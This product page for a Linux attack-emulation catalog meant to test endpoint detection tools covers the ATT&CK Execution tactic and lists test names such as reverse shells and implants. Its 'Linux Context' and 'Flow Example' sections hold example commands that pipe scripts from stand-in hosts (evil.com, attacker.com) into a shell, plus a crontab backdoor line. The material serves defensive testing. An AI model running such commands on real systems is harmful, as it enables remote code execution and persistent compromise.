EDRmetry Linux Matrix For Download / Self-Hosted - Comprehensive Hands-On Attack TTPs Catalog
- Buy now
- Learn more
1. EDRmetry Overview

Introduction
What you will get?
Goals / What to expect
EDRmetry Matrix
Virtual Machines / C2
EDRmetry Generic Flow
Contextual Execution
Changelog / Updates
2. EDRmetry Deployment

Deploy your EDRmetry Matrix Docker Container
Download EDRmetry Matrix JSON Database
Import your EDRmetry Matrix JSON Database
Provision your TARGET_X VM
Provision your KALI_X or C2_X VM
Request for HTTPS Hosted Access to EDRmetry Matrix
3. Research and emulation of Linux threats

MITRE ATT&CK TACTICS in the Linux Ecosystem
Linux Threat Landscape
Initial Access - TA0001
Discovery - TA0007
Execution - TA0002
Defense Evasion - TA0005
Persistence - TA0003
Privilege Escalation - TA0004
Exfiltration - TA0010
Command and Control - TA0011
Lateral Movement - TA0008
Credentials Access - TA0006
Impact - TA0040
Collection - TA0009

Execution - TA0002

Objective:

Run malicious code on the compromised system to achieve operational goals. Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.
ID: TA0002:
- https://attack.mitre.org/tactics/TA0002/

Linux Context:

Execution on Linux leverages its rich command-line ecosystem. Attackers execute payloads via bash, sh, or alternative shells like zsh, often chaining commands with pipes or redirects (e.g., curl http://evil.com/script.sh | bash). Legitimate utilities—wget, python, or perl—are abused to download and run code, blending into normal admin activity. Scheduled tasks via cron (e.g., crontab -e) or systemd timers ensure repeated execution, while attackers may exploit running services (e.g., injecting into httpd) to launch payloads. In cloud environments, compromised containers might execute malicious images pulled from the Docker Hub. Fileless attacks using /dev/shm or /proc/self/exe further complicate detection.

Key Techniques:

Command and Scripting Interpreter (T1059): Executing a malicious .sh file.
Scheduled Task/Job (T1053): Setting a cron job to run a backdoor every minute.
Native API (T1106): Calling execve() in a custom binary.

Flow Example:

An attacker runs wget -O- http://attacker.com/malware | sh to fetch and execute a script or adds * * * * * /bin/bash -c "/tmp/backdoor" to /etc/crontab.

Defender Strategies:

Monitor process creation and restrict execution permissions. Use EDR engines to detect anomalous command-line patterns.

The current list of corresponding EDRmetry test definitions includes:

EDR-T6138 - Bash HTTP GET data with /dev/tcp
EDR-T6122 - Dump process memory via GDB
EDR-T6009 - eBPF system("whoami") Execution with bpftrace
EDR-T6025 - Encrypted ELF implant
EDR-T6094 - Establish Unix Socket connection
EDR-T6041 - Execute binary listening from a hidden directory as root
EDR-T6085 - Execute Linux Hack Tools
EDR-T6099 - Execute LKM call_usermodehelper() on ICMP
EDR-T6205 - Export proxy_http
EDR-T6039 - File Transfer to a hidden directory
EDR-T0003 - Install suspicious RPM package
EDR-T6086 - LKM Load/unload kernel module
EDR-T6051 - Modify core_pattern file
EDR-T6177 - MySQL UDF Command Execution
EDR-T6173 - OpenSSL - hackshell download without curl
EDR-T6174 - Perl - File download without curl
EDR-T6172 - Python - File download without curl
EDR-T6247 - Python GET File over Network
EDR-T6203 - Renice or Ulimit Execution
EDR-T6123.004 - Revshell mkfifo+nc
EDR-T6171 - Simplest Proc Name Masquerading
EDR-T6278 - Execute mknod/mkfifo
EDR-T6302 - K8S - Sidecar injection
EDR-T6379 - K8S - Exec into pod
EDR-T6340 - Python HTTP POST and Exec